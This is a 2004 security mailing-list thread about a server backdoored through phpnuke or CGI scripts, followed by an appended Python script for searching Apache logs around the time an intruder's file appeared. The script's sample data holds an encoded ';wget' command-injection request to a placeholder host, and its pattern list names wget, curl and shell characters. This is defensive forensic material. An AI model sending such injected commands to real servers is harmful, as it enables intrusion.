
RE: [suse-security] Backdoor over http(s)??



There seem to be a number of security problems with phpnuke - Nessus 2.0.8a lists 8 or more tests for various problems; http://www.phpnuke.org/ says that the latest version is 7.0 and fixes several security problems including SQL injection bugs. I couldn't see 6.9 listed as a release but the site doesn't appear to have much useful information on it - most things highlight security fixes as a matter of urgency, this one seems to use <FONT SIZE=-1> for the security fixes that are listed!

I've downloaded the rs.c from the web site and it does compile, but it generates a 6.5KB executable, not the 450KB executable that you have. I think rs.c is either not all of the code, or it's a different program, or possibly a much, much earlier incarnation of it.

I would think that your Apache logs might tell you more about who executed what and when just prior to the time when the executable appeared on your system.

-----Original Message-----
From: Mátyás Tibor [mailto:templar@xxxxxxxxxxxxxx]
Sent: 13 January 2004 16:33
To: Rick Green
Cc: suse-security@xxxxxxxx
Subject: Re: [suse-security] Backdoor over http(s)??


I have got in the /cgi-bin/ directory:

-neomail (1.26)
-openwebmail (2.30)
-SuSE things
-sanecgi

but nothing else.

And I have Phpnuke 6.9 (?? PHP ??)
-----
OK, somebody could use wget, but what about the .do.sh -->
how was it possible to execute it?


Tibor

On Tue, 13 Jan 2004 10:33:27 -0500 (EST), Rick Green wrote
> Before you get too involved in analysing the content of the file 
> that was imported to your machine, you may want to close the 
> facility that allowed the download in the first place!  What have 
> you got in your cgi-bin directory that allows arbitrary use of wget?
> 
> -- 
> Rick Green
> 
> "They that can give up essential liberty to obtain a little
>  temporary safety, deserve neither liberty nor safety."
>                                   -Benjamin Franklin




-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here
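
Added example, not part of the original messages: one way to follow the suggestion above about the Apache logs is to list every request logged in the window just before the unknown executable's modification time and flag those whose decoded request line contains download or shell strings. It assumes the common/combined access log format and a known file mtime; the log lines, addresses, paths and the pattern list are constructed for illustration.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote_plus

# Apache common/combined format: host ident user [time] "request" status size ...
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+')
# Starting-point patterns only (wget and a .sh file are what this thread mentions).
SUSPICIOUS = re.compile(r'wget|curl|\.sh\b|/tmp/|[;|`]|\$\(', re.IGNORECASE)

def requests_before(log_lines, file_mtime, window=timedelta(minutes=30)):
    """Return (time, host, status, decoded_request, flagged) tuples for every
    request logged in the window that ends at file_mtime, oldest first."""
    hits = []
    for line in log_lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if not (file_mtime - window <= ts <= file_mtime):
            continue
        req = unquote_plus(m["req"])  # decode %xx and '+' so patterns can match
        hits.append((ts, m["host"], int(m["status"]), req,
                     bool(SUSPICIOUS.search(req))))
    return sorted(hits)

# Constructed sample data: documentation addresses, hypothetical paths.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jan/2004:03:10:02 +0100] "GET /index.php HTTP/1.0" 200 5120',
    '192.0.2.10 - - [13/Jan/2004:03:20:00 +0100] "GET /index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [13/Jan/2004:03:41:55 +0100] '
    '"GET /example.php?arg=%3Bwget%20http%3A%2F%2Fexample.invalid%2Ffile HTTP/1.0" 200 312',
    '192.0.2.10 - - [13/Jan/2004:03:50:00 +0100] "GET /cgi-bin/example.pl HTTP/1.0" 200 2048',
]
# Constructed mtime of the unknown executable (timezone-aware, like the log).
SAMPLE_MTIME = datetime(2004, 1, 13, 3, 45, 0, tzinfo=timezone(timedelta(hours=1)))

if __name__ == "__main__":
    for ts, host, status, req, flagged in requests_before(SAMPLE_LOG, SAMPLE_MTIME):
        print("!!" if flagged else "  ", ts.isoformat(), host, status, req)
```

A file's mtime can be changed by whoever wrote it, so widen the window or check the ctime as well if nothing turns up.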

